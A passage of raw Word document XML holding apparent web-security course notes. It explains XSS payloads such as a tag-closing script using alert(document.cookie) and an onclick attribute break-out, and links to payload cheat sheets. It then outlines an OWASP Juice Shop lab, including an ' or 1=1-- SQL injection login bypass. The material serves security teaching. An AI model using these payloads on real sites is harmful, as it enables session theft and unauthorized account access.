        </w:rPr>
        <w:t xml:space="preserve">While just entering </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;&lt;/script&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>may work. We want to close the paragraph tags. We could use the payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1872C1C0" w14:textId="77777777" w:rsidR="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;/p&gt;&lt;script&gt;alert(document.cookie);&lt;/script&gt;&lt;p&gt;hi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057FB088" w14:textId="77777777" w:rsidR="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>When this is added to the page, the HTML will look like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA3F35A" w14:textId="77777777" w:rsidR="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;p&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;/p&gt;&lt;script&gt;alert(document.cookie);&lt;/script&gt;&lt;p&gt;hi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BB8209" w14:textId="77777777" w:rsidR="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E7871E8" w14:textId="77777777" w:rsidR="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>We also spoke about how javascript can be added to attributes. Imagine that a user is able to insert links and the page renders it in this way:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB69491" w14:textId="77777777" w:rsidR="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;a href=’link’&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406E5CDC" w14:textId="77777777" w:rsidR="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To ensure that our javascript executes correctly, we need to add in an attribute, but just adding a payload straight away would mean that it’s within the single quotes so it won’t execute:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64ED4A1F" w14:textId="77777777" w:rsidR="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;a href=’link + payload’&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E417E2B" w14:textId="77777777" w:rsidR="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>So this is what the correct payload would look like</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319241F1" w14:textId="77777777" w:rsidR="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>link‘ onclick=’alert(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F87A04" w14:textId="77777777" w:rsidR="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Which is then inserted as follows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216DBF86" w14:textId="77777777" w:rsidR="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;a href=’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>link‘ onclick=’alert(1);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>’&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5949E1" w14:textId="77777777" w:rsidR="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E73FA2F" w14:textId="77777777" w:rsidR="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>XSS Payloads In Real Life</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62518E73" w14:textId="77777777" w:rsidR="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>We’ve seen that XSS can be quite dangerous and destructive. If you ever want to demonstrate a proof of concept for XSS the following payloads work well:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD2C683" w14:textId="77777777" w:rsidR="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>console.log(document.location)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A168FA4" w14:textId="77777777" w:rsidR="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This just displays the domain name in the browser javascript console without performing any destructive actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9170C0" w14:textId="77777777" w:rsidR="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C9F5E5A" w14:textId="77777777" w:rsidR="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Since there are a lot of payloads and attributes, it’s useful to refer to a list of them here:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F36C0D" w14:textId="77777777" w:rsidR="000E5473" w:rsidRDefault="007A6E65" w:rsidP="000E5473">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="2520"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId70" w:history="1">
        <w:r w:rsidR="000E5473">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https://portswigger.net/web-security/cross-site-scripting/cheat-sheet</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7A005721" w14:textId="0D22299C" w:rsidR="000E5473" w:rsidRPr="000E5473" w:rsidRDefault="007A6E65" w:rsidP="000E5473">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="2520"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId71" w:history="1">
        <w:r w:rsidR="000E5473">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="358F9317" w14:textId="0D977910" w:rsidR="006C350A" w:rsidRDefault="006C350A" w:rsidP="006C350A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070C10D7" w14:textId="6941D693" w:rsidR="006C350A" w:rsidRDefault="007A6E65" w:rsidP="006C350A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId72" w:history="1">
        <w:r w:rsidR="006C350A" w:rsidRPr="000E696A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="681C6300" w14:textId="5046C970" w:rsidR="006C350A" w:rsidRDefault="007A6E65" w:rsidP="006C350A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId73" w:history="1">
        <w:r w:rsidR="006C350A" w:rsidRPr="000E696A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/payloadbox/xss-payload-list</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7367FEA1" w14:textId="5D1D498D" w:rsidR="006C350A" w:rsidRDefault="007A6E65" w:rsidP="006C350A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId74" w:history="1">
        <w:r w:rsidR="006C350A" w:rsidRPr="000E696A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Input_Validation_Cheat_Sheet.md</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4036FE06" w14:textId="77777777" w:rsidR="006C350A" w:rsidRPr="00F512ED" w:rsidRDefault="006C350A" w:rsidP="006C350A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C948ECC" w14:textId="39640309" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40D9D847" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>OWASP Juice Shop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004AFBC8" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Start with Burpsuite, without Intercept on – walk the site to collect request-responses – form of reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A9CEEB" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Check comments for potential email addresses of site members, comments that provide insight into user interests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2873EE1B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Input “a” into search bar and check URL – search parameter will precede input with &lt;search param&gt;=&lt;search input&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028256C8" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>INJECTION VULNERABILITIES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D47E962" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>dangerous due to cause of downtime and/or loss of data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD12D52" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>ID injection points within a web application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C46FAB" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Simple as many return with an error message of sorts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFCB488" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>SQL Injection – malicious/malformed query to retrieve or tamper data from a database, log into accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A6B533" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Command Injection – user input run as system commands, allowing tampering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E823FAA" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Seen in applications that perform misconfigured ping tests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D14A4E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Email Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191C5B65" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Users can send email messages without authorization by email server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEAE8FC" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Occur when extra data is added to fields which are not interpreted correctly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F90DB3" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">Intercept login attempt with burpsuite and exchange email submission with </w:t>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>‘ or 1=1—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8F5322" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
